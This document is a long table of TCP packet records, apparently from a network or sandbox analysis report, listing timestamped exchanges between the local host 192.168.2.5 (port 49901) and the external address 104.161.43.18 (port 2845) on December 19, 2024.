                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.511805058 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.511883020 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.513164043 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.513298988 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.513379097 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.514730930 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.514880896 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.515038013 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.516225100 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.516419888 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.516486883 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.517812967 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.517916918 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.517956018 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.519176960 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.519258976 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.519330978 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.520724058 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.520857096 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.520946026 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.522216082 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.522361994 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.522409916 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.523688078 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.523785114 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.523890018 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.525173903 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.525403976 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.525458097 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.526695967 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.526820898 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.526890993 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.528173923 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.528297901 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.528345108 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.529695988 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.529773951 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.529828072 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.531205893 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.531327963 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.531389952 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.532664061 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.532799006 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.532840967 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.534266949 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.534363985 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.534447908 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.535752058 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.535913944 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.535978079 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.537189960 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.537327051 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.537482023 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.538682938 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.538724899 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.538769960 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.540208101 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.540288925 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.540328979 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.541697979 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.541769028 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.541816950 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.543181896 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.543332100 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.543467999 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.544688940 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.544794083 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.544853926 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.655316114 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.655416965 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.655489922 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.655988932 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.656052113 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.656111956 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.657037020 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.657191992 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.657249928 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.658231974 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.658328056 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.658399105 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.659467936 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.659574032 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.659646034 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.660741091 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.660864115 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.660909891 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.661864996 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.661941051 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.662034988 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.663233042 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.663300037 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.663343906 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.664259911 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.664326906 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.664371967 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.665347099 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.665420055 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.665477037 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.666502953 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.666685104 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.666795969 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.667840004 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.668011904 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.668134928 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.668783903 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.668915987 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.668981075 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.669909954 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.670036077 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.670118093 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.671101093 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.671221018 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.671267033 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.672154903 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.672280073 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.672367096 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.673291922 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.673438072 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.673481941 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.674448967 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.674602032 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.674717903 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.675600052 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.675622940 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.675667048 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.676721096 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.676876068 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.676918030 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.677854061 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.678037882 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.678128958 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.678967953 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.679074049 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.679219007 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.680125952 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.680177927 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.680273056 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.681319952 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.681372881 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.681454897 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.682429075 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.682538033 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.682583094 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.683526039 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.683641911 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.683780909 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.684680939 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.684700012 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.684851885 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.685801029 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.685921907 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.686033964 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.687005043 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.687154055 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.687206030 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.689019918 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.689161062 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.689205885 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.689965010 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.690042973 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.690112114 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.691293001 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.691423893 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.691498041 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.692183018 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.692248106 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.692289114 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.693222046 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.693341970 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.693381071 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.694169044 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.694262981 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.694320917 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.694988012 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.695123911 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.695188046 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.696161032 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.696239948 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.696324110 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.697257996 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.697395086 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.697518110 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.698321104 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.698462963 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.698679924 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.699424028 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.699626923 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.699693918 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.700517893 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.700640917 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.700690031 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.701864958 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.701973915 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.702039003 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.702811956 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.702930927 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.702979088 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.703933001 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.704118967 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.704176903 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.705168009 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.705241919 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.705461979 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.706291914 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.706374884 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.706523895 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.707405090 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.707451105 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.707608938 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.708473921 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.708587885 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.708688974 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.709678888 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.709784985 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.709878922 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.710820913 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.710925102 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.710997105 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.712013960 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.712105036 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.712150097 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.712995052 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.713104963 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.713156939 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.714147091 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.714248896 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.714337111 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.715244055 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.723254919 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.723298073 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.847440958 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.847557068 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.847623110 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.847686052 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.847856045 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.847909927 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.848901033 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.848993063 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.849056959 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.849931955 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.850040913 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.850105047 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.851032972 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.851162910 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.851346970 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.852154970 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.852264881 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.852410078 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.853264093 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.853403091 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.853451014 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.854413033 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.854512930 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.854633093 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.855501890 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.855623007 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.855679035 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.856617928 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.856739998 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.856792927 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.857800007 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.857907057 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:09.857978106 CET499012845192.168.2.5104.161.43.18
